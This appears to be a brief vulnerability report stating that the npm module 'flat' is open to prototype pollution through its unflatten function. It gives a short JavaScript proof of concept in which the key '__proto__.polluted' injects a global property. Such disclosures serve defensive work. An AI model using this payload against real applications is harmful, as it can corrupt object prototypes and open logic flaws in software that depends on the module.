This module has prototype pollution vulnerablity and it can make logic vulnerability in application use this ```js var unflatten = require('flat').unflatten; unflatten({ '__proto__.polluted': true }); console.log(polluted); // true ```